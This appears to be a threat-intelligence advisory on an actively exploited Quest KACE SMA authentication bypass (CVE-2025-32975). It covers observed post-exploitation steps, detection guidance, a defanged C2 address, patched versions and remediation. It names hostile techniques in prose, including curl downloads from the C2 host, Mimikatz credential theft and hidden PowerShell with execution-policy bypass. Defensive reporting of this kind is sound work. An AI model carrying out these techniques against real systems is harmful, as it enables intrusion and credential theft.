Overview
CVE-2025-32975 is a critical authentication bypass vulnerability in Quest KACE SMA’s SSO authentication handling mechanism. The root cause lies in improper validation of authentication tokens or session states during the SSO process, creating a pathway for attackers to forge or bypass authentication entirely. The application fails to adequately verify authentication tokens or session states, allowing requests to be processed as if they originated from authenticated users without any credential verification. The attack vector is network-based, requiring no privileges, no user interaction, and no prior authentication.
Since Quest KACE SMA serves as a centralized endpoint management platform, successful exploitation gives attackers the ability to deploy software, execute commands, and modify configurations across all managed endpoints.
Active Exploitation
Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to exploitation of CVE-2025-32975 on unpatched Quest KACE SMA instances publicly exposed to the internet.
Although some affected customers were in the education sector across different regions, Arctic Wolf does not have sufficient data to determine whether that sector was specifically targeted. Given that the exploitation involved internet-exposed appliances, the activity is assessed as likely opportunistic.
Post-Exploitation Activity
Initial access was suspected via CVE-2025-32975, with threat actors achieving administrative takeover shortly after. Observed post-exploitation activity included:
- Exploiting KPluginRunProcess functionality in KACE to execute remote commands
- Base64-encoded payloads dropped from an external server
- Files downloaded via curl from 216[.]126[.]225[.]156 to establish C2 communication
- Additional administrative accounts created via runkbot.exe and added to administrative groups
- PowerShell executed with Bypass and Hidden flags to modify system registry and enable unauthorized services
- Credential harvesting using Mimikatz, including one instance disguised as asd.exe
- RDP access to backup infrastructure (Veeam, Veritas) and domain controllers
No public PoC was available at the time exploitation began. The three related CVEs patched alongside this one — CVE-2025-32976, CVE-2025-32977, and CVE-2025-32978 — were not observed being leveraged in these incidents.
Detection Guidance
Monitor for:
- Unexpected administrative sessions or logins from unknown IPs in KACE SMA audit logs
- Anomalous SSO authentication requests without a corresponding identity provider authorization event
- Administrative actions by users with no matching legitimate login event
- Account creation activity via runkbot.exe
- Outbound curl connections from the KACE SMA host
- Mimikatz execution or renamed variants (e.g., asd.exe)
- PowerShell with
-ExecutionPolicy Bypass -WindowStyle Hiddenoriginating from KACE processes - RDP connections from the KACE host to backup servers or domain controllers
C2 IOC: 216[.]126[.]225[.]156
Affected Versions & Fixes
The vulnerabilities affect Quest KACE SMA through version 14.1 and are resolved in the following versions:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
For 13.x, the security hotfix is available via the support portal and applied under Admin console → Settings → Appliance Updates.
Remediation
- Patch immediately — this vulnerability has been sitting unpatched in production environments for nearly 10 months
- Remove KACE SMA from direct internet exposure; restrict remote admin access to VPN only
- Hunt for rogue admin accounts created via runkbot.exe
- Rotate all KACE administrative credentials
- Audit managed endpoint environments for unauthorized software deployments or configuration changes pushed post-compromise
- Treat any internet-exposed, unpatched KACE SMA instance as potentially compromised — not just vulnerable
